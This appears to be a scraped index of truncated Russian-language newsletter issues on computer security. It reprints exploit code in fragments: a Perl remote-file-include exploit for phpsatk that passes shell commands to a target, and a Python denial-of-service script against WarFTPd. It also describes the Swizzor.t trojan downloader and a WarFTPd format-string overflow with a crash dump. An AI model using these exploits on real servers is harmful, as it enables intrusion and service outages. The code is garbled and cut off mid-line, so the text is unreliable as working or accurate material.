Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.
Компьютер для продвинутых пользователей В этом выпуске: phpsatk | knowledgeBuilder | Omni-NFS Server | PHP Classifieds ПО: phpsatk1 dos.py: !/usr/bin/perl # phpsatk > Remote File Include Vulnerability # Script. :phpsatk # Discovered By. : Root3r_H3ll # Location . : Iran # Class. : Remote # Original Advisory : http://Www.PersainFox.com # We ArE : Root3r_H3LL & Arash.Rj # ; while $cmd ~ "exit) { $xpl = LWP:UserAgent>new) or die; $req = HTTP:Request>new(GET$target$file$shellsite?&$shellcmd$cmd) or die\n\n...
Компьютер для продвинутых пользоватлей Выпус по вурусам. Trojan-Downloader.Win32. Swizzor.t.
Компьютер для продвинутых пользователей В этом выпуске: Trojan-Downloader.Win32. Swizzor.t ПО: Trojan-Downloader.Win32. Swizzor.t Троянская программа-загрузчик, которая без ведома пользователя загружает из сети Интернет программное обеспечение и запускает его. Программа является приложением Windows (PE EXE-файл. Имеет размер 11 288 байт. Написана на C. Деструктивная активность : Троянская программа имеет функцию загрузки файлов из интернета и запуска их на зараженнном компьютере без ведома пользователя. Ад...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.
Компьютер для продвинутых пользователей В этом выпуске: WarFTPd 1.82.00-RC11 | Windows 2000, XP | ПО: WarFTPd 1.82.00-RC11 dos.py: !/usr/bin/env python import sys import ftplib print "WAR_FTPD Remote Denial Of Service (DOS" print "Copyright (c) Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP) print ] Connecting to target " msg = ftp.connect(target, targetPort) print ] Ok. Target banner" print msg print print ] Trying to logging anonymously" msg = ftp.login) # Anonymous p...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в WARFTPd, Kayako
Компьютер для продвинутых пользователей В этом выпуске: WARFTPd | Kayako SupportSuite | PhpMyChat Plus | PhpMyChat | YANS ПО: WARFTPd Версия: 1.82.00 Уязвимость: Продукт подвержен переполнению буфера, когда отправляются команды большой длины с символами %s" внутри. Это выглядит, как невыполняемый, содержащий ошибки запрос, однако он выполнится и приведёт к зависанию системы. При крахе сервера выдаёт ошибку: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s...